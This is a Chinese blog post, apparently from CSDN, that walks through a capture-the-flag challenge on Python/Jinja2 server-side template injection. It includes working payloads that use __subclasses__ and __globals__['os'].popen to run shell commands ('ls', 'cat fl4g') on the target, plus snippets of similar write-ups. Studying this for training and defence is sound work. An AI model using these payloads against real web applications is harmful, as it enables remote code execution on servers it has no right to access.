WEB:Web_python_template_injection

已于 2023-07-29 15:06:55 修改
阅读量241 收藏 1
点赞数 1
文章标签: 前端 python 开发语言 web安全 网络安全
于 2023-07-29 15:05:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/131994778
版权

背景知识

        python模板注入

        ssit

题目

 

打开题目,发现页面提示,翻译为python模板注入

先测试是否存在注入

可以发现被执行了

先查看所有的子类

payload

{{[].__class__.__base__.__subclasses__()}}

 

利用site.Printer的os模块执行命令

payload

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

 

 可以看到当前目录下有个fl4g,执行cat fl4g

payload

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

 得到flag

参考学习链接:

https://www.cnblogs.com/qiushuo/p/17454498.html

攻防世界-web-Web_python_template_injection_wuh2333的博客-CSDN博客

Web_python_template_injection(Python模块注入)_kali-Myon的博客-CSDN博客

sleepywin
关注
攻防世界CTF Web_python_template_injection
cadandme的博客
02-15 3684
记录模块注入学习过程 题目:Web_python_template_injection提醒是模块注入 在Jinja2模板引擎,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 模块注入测试: 网址输入“{{1*21}}”页面显示21,说面存在“SSTI” 在其他大佬的博客收集的相关知识: SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对pyt
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1173
好难啊
攻防世界WEB---Web_python_template_injection
Red Rapefruit
07-24 593
有关python模板注入漏洞的学习
攻防世界 Web_python_template_injection(flask模版注入)
最新发布
weixin_73399382的博客
07-06 1315
通过调用__class__.__mro__,可以获取该类的方法解析顺序(Method Resolution Order,MRO),它是一个元组,按照查找方法时的顺序列出了对象所属类及其父类。解析:"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes),而不是对象(objects)。综上所述,"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes)SSTI与这个方法密不可分。
【攻防世界】Web_python_template_injection
2302_79800344的博客
04-01 1034
【代码】【攻防世界】Web_python_template_injection
Web_python_template_injection[WriteUp]
sGanYu
08-01 418
访问靶场靶场地址:攻防世界 脚本编写: 随便调用脚本生成的其一个payload就行,这里我选择的是第一个
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3355
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.csdn.net/qq_36374896/arti...
攻防世界之Web_python_template_injection
qq_42728977的博客
01-11 307
之前做过一次python沙盒逃逸的题,但是当时只是看WP没有仔细地深入,这次仔细的探究一下这个漏洞的原理和防御。在这里只是写一点开端,后续再深入,因为我看资料发现这个漏洞牵扯到的东西挺多的。 题目 Web_python_template_injection 原理 python模块注入、python沙河逃逸 环境 firefox、hackbar 流程 在题目的URL后面添加如下命令,就可以命令执行了...
【攻防世界】十四 --- Web_python_template_injection --- SSTI
qq_43168364的博客
12-27 436
题目 — Web_python_template_injection 考点:SSTI(服务器模板注入) 一、知识点 1. 何为模板注入 模板引擎可以让(网站)程序实现 界面 与 数据 分离,业务代码 与 逻辑代码 的分离,这大大提升了开发效率,良好的设计也使得代码重用变得更加容易。 但是模板引擎也拓宽了我们的攻击面。注入到模板的代码可能会引发 RCE 或者 XSS 2. flask基础 (1)路由 from flask import flask @app.route('/index/'
web python template injection_攻防世界-Web_python_template_injection详解
05-26
Web Python Template Injection 是一种常见的 Web 漏洞类型,通常缩写为 SSTI(Server Side Template Injection)。该漏洞是由于 Web 应用程序未正确处理用户输入导致的,攻击者可以通过构造恶意输入来执行任意代码...
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1041
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
Flask入门系列(三)–模板
ASP.NET
11-03 252
在第一篇,我们讲到了Flask的Controller和Model,但是一个完整的MVC,没有View怎么行?前端代码如果都靠后台拼接而成,就太麻烦了。本篇,我们就介绍下Flask的View,即模板。 系列文章 Flask入门系列(一)-Hello World Flask入门系列(二)-路由 Flask入门系列(三)-模板 Flask入门系列(四)-请求,响应及会话 Flask入门...
攻防世界 Web_python_template_injection
feng的博客
09-03 549
前言 这是一道关于python的flask模板注入的题目,刚碰到这个题目的时候我对于flask和模板注入是没有接触过的,因此上网查找相关知识并结合攻防世界给出的WP做出了这个题目。 做题前知识点的了解 https://xz.aliyun.com/t/3679 这篇博客对于我这样的萌新来说非常友好,对于flask的ssti模板注入讲解的很好,推荐一看。看完这个,就对flask的模板注入有了一个大致的了解,但是对于如何应用可能有些迷茫,下面结合攻防世界的这个题目来更加深入的了解。 WP 作为一个萌新,刚打开这个
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2350
攻防世界,python模板注入
Web_python_template_injectionPython模块注入)
Welcome To Myon'Blog !
04-11 1466
Python模块注入 flask/jinja2 常用于ssti的魔术方法 获取基类的几种方法 获取基本类的子类 采用os模块的listdir函数来读取目录 常用payload
[wp] 攻防世界 Web_python_template_injection
MercyLin的博客
09-28 6638
7*7变成49了,应该存在模板注入 http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...
攻防世界Web_python_template_injection
MIGENGKING的博客
04-23 3516
打开题目: 题目提示为Python模块注入: 1首先判断一下: 网址输入“{{7+7}}”页面显示14,说面存在“SSTI” : SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja...
攻防世界 web进阶区 Web_python_template_injection
m0_51395584的博客
06-17 1078
攻防世界 web进阶区 Web_python_template_injection python的flask模板漏洞利用,本人对这个模板也不是很熟悉,大家将就看吧。
web python template injection_XCTF Web_python_template_injection
weixin_39963853的博客
12-10 80
一.进入实验发现是python的模板注入1.我们先来了解一下:instance.__class__ 可以获取当前实例的类对象class.__mro__ 获取当前类对象的所有继承类每一个新式类都保留了它所有的子类的引用,__subclasses__()这个方法返回了类的所有存活的子类的引用(注意是类对象引用,不是实例)在Jinja2模板引擎,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,...
入门指南:使用MOD_WSGI进行Python Web开发
WSGI是一个用于连接Python web应用程序和web服务器的接口标准,旨在促进应用在不同web服务器之间的移植性。它定义了服务器如何与Python应用交互的协议,PEP333是这个规范的官方文档,可以在此处查阅:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值